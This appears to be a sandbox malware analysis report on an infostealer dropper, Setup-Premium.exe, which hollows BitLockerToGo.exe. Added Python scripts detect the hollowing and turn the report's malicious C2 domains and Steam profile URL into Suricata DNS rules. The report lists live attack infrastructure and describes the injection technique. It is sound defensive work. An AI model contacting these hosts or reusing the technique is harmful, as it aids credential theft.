                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: mathcucom.sbs
                  Source: Setup-Premium.exe, 00000000.00000002.2171424437.0000000002584000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: proclaimykn.buzz
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C9C008
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 448000
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 458000
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Queries volume information: C:\Users\user\Desktop\Setup-Premium.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Queries volume information: C:\Windows VolumeInformation
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Queries volume information: C:\Windows\AppReadiness VolumeInformation
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
                  Source: C:\Users\user\Desktop\Setup-Premium.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Setup-Premium.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
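The "Memory written" and "Process created" lines above are the classic hollowing pattern: the dropper spawns the signed Windows binary BitLockerToGo.exe and then overwrites its image starting at the 32-bit default base 0x400000 (PE header) followed by section addresses, while the write at 0x2C9C008 is outside the image. The following script is an added example, not part of the Joe Sandbox report or of its tooling: it parses the report's own behaviour lines (copied with the link text removed, plus one constructed line for contrast) and correlates them into a verdict. The default image base, the 1 MiB image window and the verdict strings are assumptions of the example.

```python
"""Flag process hollowing from sandbox behaviour lines.

Added example, not part of the Joe Sandbox report. REPORT_LINES are the
report's observations copied verbatim (minus the "Jump to behavior" link
text) plus one constructed line. The 32-bit default image base (0x400000)
and a 1 MiB image window are assumptions used to tell image writes apart
from heap or parameter writes.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^Source:\s+(?P<src>.+?)\s*(?P<evt>Process created|Memory written):\s+"
    r"(?P<target>\S+)(?:\s+base:\s+(?P<base>[0-9A-Fa-f]+))?"
)

REPORT_LINES = [
    # Copied from the report's behaviour section, in the order listed there.
    r"Source: C:\Users\user\Desktop\Setup-Premium.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2C9C008",
    r"Source: C:\Users\user\Desktop\Setup-Premium.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000",
    r"Source: C:\Users\user\Desktop\Setup-Premium.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000",
    r"Source: C:\Users\user\Desktop\Setup-Premium.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000",
    r"Source: C:\Users\user\Desktop\Setup-Premium.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 448000",
    r"Source: C:\Users\user\Desktop\Setup-Premium.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 458000",
    r'Source: C:\Users\user\Desktop\Setup-Premium.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"',
    # Constructed line (not from the report): an image write into a process
    # the writer did not create, to show the weaker verdict.
    r"Source: C:\Tools\dbg.exe Memory written: C:\Windows\System32\notepad.exe base: 400000",
]


def parse_events(lines):
    """Return (source, event, target, base_or_None) for every matching line."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            base = int(m["base"], 16) if m["base"] else None
            events.append((m["src"], m["evt"], m["target"], base))
    return events


def find_hollowing(lines, image_base=0x400000, image_window=0x100000):
    """Correlate per (source, target). Writes at the image base (PE header)
    into a process the same source created score as process hollowing;
    image writes into a process it did not create get a weaker verdict.
    Ordering of the lines is not relied on."""
    created = set()
    writes = defaultdict(list)
    for src, evt, target, base in parse_events(lines):
        key = (src, target)
        if evt == "Process created":
            created.add(key)
        elif base is not None:
            writes[key].append(base)

    findings = []
    for key, addrs in writes.items():
        in_image = sorted(a for a in addrs if image_base <= a < image_base + image_window)
        if not in_image:
            continue  # heap/parameter writes alone are not an image overwrite
        header_write = image_base in in_image
        hollowed = header_write and key in created
        findings.append({
            "source": key[0],
            "target": key[1],
            "created_by_source": key in created,
            "header_write": header_write,
            "section_writes": [a for a in in_image if a != image_base],
            "other_writes": sorted(a for a in addrs if a not in in_image),
            "verdict": "process hollowing" if hollowed else "suspicious cross-process image write",
        })
    return findings


if __name__ == "__main__":
    for f in find_hollowing(REPORT_LINES):
        print(f"{f['verdict']}: {f['source']} -> {f['target']} "
              f"(PE header written: {f['header_write']}, "
              f"section writes: {[hex(a) for a in f['section_writes']]})")
```

Run on the report's lines, the parent/child pair Setup-Premium.exe -> BitLockerToGo.exe comes out as process hollowing with section writes at 0x401000, 0x445000, 0x448000 and 0x458000 and the 0x2C9C008 write set aside as non-image. The same correlation (create-suspended followed by writes at the child's image base from the creating process) is what to look for in endpoint telemetry; a rule that only checks "wrote to another process" would also fire on debuggers.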

                  Stealing of Sensitive Information

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 2.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Setup-Premium.exe.2800000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Setup-Premium.exe.2800000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2173525211.00000000029BF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: 2.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Setup-Premium.exe.2800000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Setup-Premium.exe.2800000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2173525211.00000000029BF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

The number in parentheses is the report's signature count for that technique. Techniques listed without a count are the matrix's standard entries and were not observed in this analysis.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
Execution: Windows Management Instrumentation (1), Command and Scripting Interpreter (2), Native API (1), PowerShell (1), Launchd
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script
Privilege Escalation: Process Injection (311), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (2), Process Injection (311), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (3), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
Discovery: Security Software Discovery (11), Virtualization/Sandbox Evasion (2), Account Discovery (1), System Information Discovery (22), Internet Connection Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
Collection: Screen Capture (1), Archive Collected Data (1), Clipboard Data (2), Input Capture, Keylogging
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (1), Non-Application Layer Protocol (3), Application Layer Protocol (114), Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction
                  No Antivirus matches
Source | Detection | Scanner | Label
https://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 0% | URL Reputation | safe
http://www.valvesoftware.com/legal.htm | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | 0% | URL Reputation | safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | 0% | URL Reputation | safe
https://steamcommunity.com/profiles/76561199724331900 | 100% | URL Reputation | malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | 0% | URL Reputation | safe
http://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe
https://store.steampowered.com/points/shop/ | 0% | URL Reputation | safe
https://steamcommunity.com/profiles/76561199724331900/inventory/ | 100% | URL Reputation | malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 0% | URL Reputation | safe
https://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC | 0% | URL Reputation | safe
https://store.steampowered.com/about/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english | 0% | URL Reputation | safe
https://help.steampowered.com/en/ | 0% | URL Reputation | safe
https://store.steampowered.com/news/ | 0% | URL Reputation | safe
http://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1 | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en | 0% | URL Reputation | safe
https://store.steampowered.com/stats/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 0% | URL Reputation | safe
https://store.steampowered.com/steam_refunds/ | 0% | URL Reputation | safe
http://json-schema.org/draft-04/schema# | 0% | URL Reputation | safe
https://store.steampowered.com/legal/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl | 0% | URL Reputation | safe
https://store.steampowered.com/ | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
condifendteu.sbs | 104.21.79.35 | true | true | | unknown
steamcommunity.com | 104.102.49.254 | true | true | | unknown
vennurviot.sbs | 172.67.140.193 | true | true | | unknown
drawwyobstacw.sbs | 188.114.96.3 | true | true | | unknown
mathcucom.sbs | 188.114.96.3 | true | true | | unknown
proclaimykn.buzz | 188.114.96.3 | true | true | | unknown
sergei-esenin.com | 104.21.53.8 | true | true | | unknown
ehticsprocw.sbs | 172.67.173.224 | true | true | | unknown
resinedyw.sbs | 172.67.205.156 | true | true | | unknown
enlargkiw.sbs | 172.67.152.13 | true | true | | unknown
allocatinow.sbs | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
enlargkiw.sbs | true | | unknown
allocatinow.sbs | true | | unknown
drawwyobstacw.sbs | true | | unknown
mathcucom.sbs | true | | unknown
https://steamcommunity.com/profiles/76561199724331900 | true | URL Reputation: malware | unknown
https://vennurviot.sbs/api | true | | unknown
ehticsprocw.sbs | true | | unknown
condifendteu.sbs | true | | unknown
https://drawwyobstacw.sbs/api | true | | unknown
https://resinedyw.sbs/api | true | | unknown
https://mathcucom.sbs/api | true | | unknown
resinedyw.sbs | true | | unknown
vennurviot.sbs | true | | unknown
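The two tables above are the network IOC set of this sample: ten freshly registered .sbs/.buzz/.com domains with an /api endpoint, all resolving to Cloudflare-fronted addresses (the 104.21.x, 172.67.x and 188.114.96.x ranges belong to Cloudflare), plus a steamcommunity.com profile URL that the report rates as malware while steamcommunity.com itself is a legitimate host. Two practical consequences: block and hunt on the domain names, not the IPs, which would only block Cloudflare; and do not blocklist steamcommunity.com wholesale, only the flagged profile path. The script below is an added example, not part of the Joe Sandbox report: it turns the domain table into Suricata DNS rules and checks constructed eve-json DNS log lines against the same list, with exact-or-subdomain matching so that a lookalike such as notresinedyw.sbs does not match. The SID range, rule message text, classtype and the log lines are assumptions of the example.

```python
"""Suricata DNS rules and a DNS-log check from the report's contacted domains.

Added example, not part of the Joe Sandbox report. IOC_DOMAINS is copied from
the report's Name / IP / Active / Malicious table; the eve-json log lines are
constructed; SID range, msg text and classtype are assumptions.
"""
import json

IOC_DOMAINS = {
    "condifendteu.sbs": "104.21.79.35",
    "vennurviot.sbs": "172.67.140.193",
    "drawwyobstacw.sbs": "188.114.96.3",
    "mathcucom.sbs": "188.114.96.3",
    "proclaimykn.buzz": "188.114.96.3",
    "sergei-esenin.com": "104.21.53.8",
    "ehticsprocw.sbs": "172.67.173.224",
    "resinedyw.sbs": "172.67.205.156",
    "enlargkiw.sbs": "172.67.152.13",
    "allocatinow.sbs": None,  # the report lists no resolved IP for this one
}


def normalize(name):
    """Lower-case and drop the trailing dot of a DNS name."""
    return name.strip().rstrip(".").lower()


def match_ioc_domain(qname, iocs=IOC_DOMAINS):
    """Return the IOC that qname equals or is a subdomain of, else None.
    A plain endswith() check would also fire on 'notresinedyw.sbs'."""
    q = normalize(qname)
    for ioc in iocs:
        if q == ioc or q.endswith("." + ioc):
            return ioc
    return None


def suricata_dns_rules(iocs=IOC_DOMAINS, first_sid=9000001):
    """One alert per domain. dotprefix prepends '.' to the query buffer, so
    content:".domain" with endswith matches the domain and its subdomains
    and nothing else (the rule-level equivalent of match_ioc_domain)."""
    rules = []
    for i, ioc in enumerate(sorted(iocs)):
        rules.append(
            'alert dns $HOME_NET any -> any any ('
            f'msg:"LummaC C2 domain lookup {ioc}"; '
            f'dns.query; dotprefix; content:".{ioc}"; nocase; endswith; '
            f'classtype:trojan-activity; sid:{first_sid + i}; rev:1;)'
        )
    return rules


# Constructed eve-json DNS events (not real traffic from the analysis).
SAMPLE_EVE_LINES = [
    '{"timestamp":"2024-10-12T10:00:01","event_type":"dns","src_ip":"10.0.0.5","dns":{"type":"query","rrname":"mathcucom.sbs"}}',
    '{"timestamp":"2024-10-12T10:00:02","event_type":"dns","src_ip":"10.0.0.5","dns":{"type":"query","rrname":"www.steamcommunity.com"}}',
    '{"timestamp":"2024-10-12T10:00:03","event_type":"dns","src_ip":"10.0.0.7","dns":{"type":"query","rrname":"notresinedyw.sbs"}}',
    '{"timestamp":"2024-10-12T10:00:04","event_type":"dns","src_ip":"10.0.0.9","dns":{"type":"query","rrname":"API.Drawwyobstacw.SBS."}}',
    '{"timestamp":"2024-10-12T10:00:05","event_type":"flow","src_ip":"10.0.0.9","dest_ip":"188.114.96.3"}',
]


def scan_eve(lines, iocs=IOC_DOMAINS):
    """Return a hit per DNS event whose query name matches an IOC domain."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("event_type") != "dns":
            continue
        rrname = ev.get("dns", {}).get("rrname")
        if not rrname:
            continue
        ioc = match_ioc_domain(rrname, iocs)
        if ioc:
            hits.append({"src_ip": ev.get("src_ip"), "query": rrname,
                         "ioc": ioc, "ioc_ip": iocs[ioc]})
    return hits


if __name__ == "__main__":
    print("\n".join(suricata_dns_rules()))
    for h in scan_eve(SAMPLE_EVE_LINES):
        print(f"{h['src_ip']} looked up {h['query']} -> IOC {h['ioc']} ({h['ioc_ip']})")
```

In the constructed log only 10.0.0.5 (mathcucom.sbs) and 10.0.0.9 (a mixed-case subdomain of drawwyobstacw.sbs with a trailing dot) are reported; the lookalike and the www.steamcommunity.com lookup are not. To hunt for the flagged Steam profile itself, match the path /profiles/76561199724331900 on HTTP traffic where TLS is inspected; on plain DNS or SNI the profile is indistinguishable from any other Steam visit.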
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/ | BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F12000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp | BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://steamcommunity.com/?subsection=broadcasts | BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://sergei-esenin.com/ | BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://store.steampowered.com/subscriber_agreement/ | BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/zitadel/zitadel/blob/new-eventstore/cmd/zitadel/startup.yaml. | Setup-Premium.exe | false | | unknown
http://www.valvesoftware.com/legal.htm | BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://json-schema.org/draft-04/schema#/properties/maximum | Setup-Premium.exe | false | | unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://json-schema.org/draft-04/schema#/properties/title | Setup-Premium.exe | false | | unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://swagger.io/v2/schema.json# | Setup-Premium.exe | false | | unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi | BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://drawwyobstacw.sbs/ht | BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://steamcommunity.com/m | BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://json-schema.org/draft-04/schema#/properties/default | Setup-Premium.exe | false | | unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://json-schema.org/draft-04/schema#/definitions/positiveInteger | Setup-Premium.exe | false | | unknown
http://json-schema.org/draft-04/schema#/properties/uniqueItems | Setup-Premium.exe | false | | unknown
http://store.steampowered.com/privacy_agreement/ | BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://store.steampowered.com/points/shop/ | BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://gorm.io/docs/hooks.htmlWarning: | Setup-Premium.exe | false | | unknown
http://json-schema.org/draft-04/schema#/properties/pattern | Setup-Premium.exe | false | | unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/ | BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://store.steampowered.com/privacy_agreement/ | BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.cloudflare.com/learning/access-manag | BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.cloudflare.com/5xx-error-landing | BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F96000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F12000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en | BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
